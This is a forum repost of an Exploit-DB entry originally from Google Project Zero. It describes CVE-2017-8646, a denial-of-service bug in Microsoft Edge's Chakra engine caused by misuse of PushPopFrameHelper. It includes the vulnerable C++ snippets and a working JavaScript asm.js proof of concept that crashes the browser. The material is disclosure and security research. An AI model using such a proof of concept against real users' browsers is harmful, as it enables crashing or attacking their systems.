Exploit Microsoft Edge Chakra - 'InterpreterStackFrame::ProcessLinkFailedAsmJsModule' Incorrect Usage of 'PushPopFrameHelper' (Denial of Service)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
42470
Проверка EDB
  1. Пройдено
Автор
GOOGLE SECURITY RESEARCH
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2017-8646
Дата публикации
2017-08-17
Microsoft Edge Chakra - 'InterpreterStackFrame::processLinkFailedAsmJsModule' Incorrect Usage of 'PushPopFrameHelper' (Denial of Service)
HTML:
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1277

PushPopFrameHelper is a class that pushes the current stack frame object in its constructor and pops it in the destructor. So it should be used like "PushPopFrameHelper holder(...)", but InterpreterStackFrame::ProcessLinkFailedAsmJsModule uses it like a function.

Var InterpreterStackFrame::ProcessLinkFailedAsmJsModule()
{
    ...
    PushPopFrameHelper(newInstance, _ReturnAddress(), _AddressOfReturnAddress());
    ...
}

It pushes "newInstance" and immediately pop it.

The PoC will crash in the following code.
void BailOutRecord::ScheduleLoopBodyCodeGen(Js::ScriptFunction * function, Js::ScriptFunction * innerMostInlinee, BailOutRecord const * bailOutRecord, IR::BailOutKind bailOutKind)
{
    ...
    Js::InterpreterStackFrame * interpreterFrame = executeFunction->GetScriptContext()->GetThreadContext()->GetLeafInterpreterFrame(); <<-- Invalid stack frame object
    loopHeader = executeFunction->GetLoopHeader(interpreterFrame->GetCurrentLoopNum()); <<-- interpreterFrame->GetCurrentLoopNum() == -1
    ...
}


PoC:
-->

function asmModule() {
    'use asm';

    let a = [1, 2, 3, 4];
    for (let i = 0; i < 0x100000; i++) {  // JIT
        a[0] = 1;
        if (i === 0x30000) {
            a[0] = {};  // the array type changed, bailout!!
        }
    }

    function f(v) {
        v = v | 0;
        return v | 0;
    }
    return f;
}

asmModule(1);
 
Источник
www.exploit-db.com

Похожие темы